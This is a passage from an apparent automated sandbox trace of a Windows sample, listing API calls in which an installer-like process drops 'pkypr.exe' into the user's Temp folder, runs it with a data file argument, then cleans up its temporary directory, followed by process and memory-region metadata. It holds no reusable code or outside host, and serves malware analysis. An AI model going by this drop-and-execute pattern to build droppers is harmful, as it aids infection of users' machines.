lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0114.935] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0114.935] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0114.935] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="pkypr.exe" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe" [0114.935] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\pkypr.exe")) returned 0xffffffff [0114.935] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\pkypr.exe")) returned 0xffffffff [0114.935] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\pkypr.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0114.936] SetFilePointer (in: hFile=0x210, lDistanceToMove=217761, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x352a1 [0114.936] ReadFile (in: hFile=0x210, lpBuffer=0x19f3f0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x19f3f0*, lpNumberOfBytesRead=0x19f330*=0x4, lpOverlapped=0x0) returned 1 [0114.936] GetTickCount () returned 0x1c50dfe [0114.936] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x610, lpNumberOfBytesRead=0x19f330, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19f330*=0x610, lpOverlapped=0x0) returned 1 [0115.000] GetTickCount () returned 0x1c50e4c [0115.000] MulDiv (nNumber=1552, nNumerator=100, nDenominator=1552) returned 100 [0115.000] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0115.000] WriteFile (in: hFile=0x28, lpBuffer=0x418ec0*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x19f33c, lpOverlapped=0x0 | out: lpBuffer=0x418ec0*, lpNumberOfBytesWritten=0x19f33c*=0x1400, lpOverlapped=0x0) returned 1 [0115.002] GetTickCount () returned 0x1c50e4c [0115.002] MulDiv (nNumber=1552, nNumerator=100, nDenominator=1552) returned 100 [0115.002] wsprintfW (in: param_1=0x19f34c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0115.002] SetFileTime (hFile=0x28, lpCreationTime=0x19f6b8, lpLastAccessTime=0x0, lpLastWriteTime=0x19f6b8) returned 1 [0115.002] CloseHandle (hObject=0x28) returned 1 [0115.004] lstrcpynW (in: lpString1=0x4281c0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0115.004] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0115.004] lstrcpynW (in: lpString1=0x42821e, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0115.004] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0115.004] lstrcpynW (in: lpString1=0x40a5c8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca" [0115.004] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x426710*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f3d8 | out: lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca", lpProcessInformation=0x19f3d8*(hProcess=0x228, hThread=0x28, dwProcessId=0xca4, dwThreadId=0x79c)) returned 1 [0115.382] CloseHandle (hObject=0x28) returned 1 [0115.382] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0115.577] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0115.577] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0116.347] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0116.347] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0116.580] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0116.580] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0117.115] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0117.116] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0117.242] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0117.242] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0117.367] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0117.367] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0117.505] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0117.505] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0117.614] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0117.614] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0117.766] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0117.766] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0117.873] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0117.873] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0117.989] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0117.989] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0118.136] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0118.136] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0118.246] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0118.246] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x102 [0118.417] PeekMessageW (in: lpMsg=0x19f3b4, hWnd=0x0, wMsgFilterMin=0xf, wMsgFilterMax=0xf, wRemoveMsg=0x1 | out: lpMsg=0x19f3b4) returned 0 [0118.418] WaitForSingleObject (hHandle=0x228, dwMilliseconds=0x64) returned 0x0 [0118.418] GetExitCodeProcess (in: hProcess=0x228, lpExitCode=0x19f3e4 | out: lpExitCode=0x19f3e4*=0x0) returned 1 [0118.418] CloseHandle (hObject=0x228) returned 1 [0118.418] DestroyWindow (hWnd=0x0) returned 0 [0118.419] EndDialog (hDlg=0x7025a, nResult=0x0) returned 1 [0118.453] CloseHandle (hObject=0x210) returned 1 [0118.454] lstrcpynW (in: lpString1=0x425f10, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp" [0118.454] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned 47 [0118.454] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nstc98.tmp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac105d68, ftCreationTime.dwHighDateTime=0x1d86048, ftLastAccessTime.dwLowDateTime=0xac105d68, ftLastAccessTime.dwHighDateTime=0x1d86048, ftLastWriteTime.dwLowDateTime=0xac105d68, ftLastWriteTime.dwHighDateTime=0x1d86048, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nstC98.tmp", cAlternateFileName="")) returned 0x57e570 [0118.454] FindClose (in: hFindFile=0x57e570 | out: hFindFile=0x57e570) returned 1 [0118.455] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned 47 [0118.455] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0118.455] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xac43371a, ftLastAccessTime.dwHighDateTime=0x1d86048, ftLastWriteTime.dwLowDateTime=0xac43371a, ftLastWriteTime.dwHighDateTime=0x1d86048, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x57e470 [0118.456] FindClose (in: hFindFile=0x57e470 | out: hFindFile=0x57e470) returned 1 [0118.456] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0118.456] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local") returned 31 [0118.456] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x57e570 [0118.456] FindClose (in: hFindFile=0x57e570 | out: hFindFile=0x57e570) returned 1 [0118.456] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local") returned 31 [0118.457] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData") returned 25 [0118.457] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x57e3b0 [0118.457] FindClose (in: hFindFile=0x57e3b0 | out: hFindFile=0x57e3b0) returned 1 [0118.457] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData") returned 25 [0118.457] lstrlenW (lpString="C:\\Users\\RDHJ0C~1") returned 17 [0118.457] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x57e630 [0118.458] FindClose (in: hFindFile=0x57e630 | out: hFindFile=0x57e630) returned 1 [0118.458] lstrlenW (lpString="C:\\Users\\RDHJ0C~1") returned 17 [0118.458] lstrlenW (lpString="C:\\Users") returned 8 [0118.458] FindFirstFileW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x57e3b0 [0118.459] FindClose (in: hFindFile=0x57e3b0 | out: hFindFile=0x57e3b0) returned 1 [0118.459] lstrlenW (lpString="C:\\Users") returned 8 [0118.459] lstrlenW (lpString="C:") returned 2 [0118.459] lstrlenW (lpString="C:") returned 2 [0118.459] lstrcatW (in: lpString1="C:", lpString2="\\" | out: lpString1="C:\\") returned="C:\\" [0118.459] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0118.459] lstrcpynW (in: lpString1=0x425710, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp" [0118.459] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp\\*.*") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp\\*.*" [0118.459] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp\\" [0118.459] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp\\") returned 48 [0118.459] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nstc98.tmp\\*.*"), lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac105d68, ftCreationTime.dwHighDateTime=0x1d86048, ftLastAccessTime.dwLowDateTime=0xac105d68, ftLastAccessTime.dwHighDateTime=0x1d86048, ftLastWriteTime.dwLowDateTime=0xac105d68, ftLastWriteTime.dwHighDateTime=0x1d86048, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75656b08, dwReserved1=0x75656e7e, cFileName=".", cAlternateFileName="")) returned 0x57e3b0 [0118.460] FindNextFileW (in: hFindFile=0x57e3b0, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac105d68, ftCreationTime.dwHighDateTime=0x1d86048, ftLastAccessTime.dwLowDateTime=0xac105d68, ftLastAccessTime.dwHighDateTime=0x1d86048, ftLastWriteTime.dwLowDateTime=0xac105d68, ftLastWriteTime.dwHighDateTime=0x1d86048, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75656b08, dwReserved1=0x75656e7e, cFileName="..", cAlternateFileName="")) returned 1 [0118.460] FindNextFileW (in: hFindFile=0x57e3b0, lpFindFileData=0x19f914 | out: lpFindFileData=0x19f914*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac105d68, ftCreationTime.dwHighDateTime=0x1d86048, ftLastAccessTime.dwLowDateTime=0xac105d68, ftLastAccessTime.dwHighDateTime=0x1d86048, ftLastWriteTime.dwLowDateTime=0xac105d68, ftLastWriteTime.dwHighDateTime=0x1d86048, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x75656b08, dwReserved1=0x75656e7e, cFileName="..", cAlternateFileName="")) returned 0 [0118.460] FindClose (in: hFindFile=0x57e3b0 | out: hFindFile=0x57e3b0) returned 1 [0118.460] FindFirstFileW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nstc98.tmp"), lpFindFileData=0x426758 | out: lpFindFileData=0x426758*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac105d68, ftCreationTime.dwHighDateTime=0x1d86048, ftLastAccessTime.dwLowDateTime=0xac105d68, ftLastAccessTime.dwHighDateTime=0x1d86048, ftLastWriteTime.dwLowDateTime=0xac105d68, ftLastWriteTime.dwHighDateTime=0x1d86048, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nstC98.tmp", cAlternateFileName="")) returned 0x57e3f0 [0118.460] FindClose (in: hFindFile=0x57e3f0 | out: hFindFile=0x57e3f0) returned 1 [0118.460] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp") returned 47 [0118.460] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp\\" [0118.460] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nstc98.tmp")) returned 0x10 [0118.460] SetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp\\", dwFileAttributes=0x10) returned 1 [0118.461] RemoveDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nstC98.tmp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nstc98.tmp")) returned 1 [0118.461] OleUninitialize () [0118.468] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0x2a4 Thread: id = 3 os_tid = 0x1220 Thread: id = 4 os_tid = 0x8f4 Process: id = "2" image_name = "pkypr.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\pkypr.exe" page_root = "0x6cf7e000" os_pid = "0xca4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x838" cmd_line = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\zpcthwca" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fe14" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 364 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 365 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 366 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 367 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 368 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 369 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 370 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 371 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 372 start_va = 0x400000 end_va = 0x404fff monitored = 1 entry_point = 0x401000 region_type = mapped_file name = "pkypr.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\pkypr.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\pkypr.exe") Region: id = 373 start_va = 0x77830000 end_va = 0x779aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 374 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 375 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 376 start_va = 0x7fff0000 end_va = 0x7ffdab58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 377 start_va = 0x7ffdab590000 end_va = 0x7ffdab750fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 378 start_va = 0x7ffdab751000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffdab751000" filename = "" Region: id = 379 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 380 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 381 start_va = 0x639e0000 end_va = 0x63a2ffff monitored = 0 entry_point = 0x639f8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 382 start_va = 0x63a40000 end_va = 0x63ab9fff monitored = 0 entry_point = 0x63a53290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 383 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 384 start_va = 0x63a30000 end_va = 0x63a37fff monitored = 0 entry_point = 0x63a317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 385 start_va = 0x470000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 386 start_va = 0x74580000 end_va = 0x7465ffff monitored = 0 entry_point = 0x74593980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 387 start_va = 0x77420000 end_va = 0x7759dfff monitored = 0 entry_point = 0x774d1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 388 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 389 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 390 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 391 start_va = 0x744b0000 end_va = 0x74541fff monitored = 0 entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 392 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 393 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 394 start_va = 0x77740000 end_va = 0x7776afff monitored = 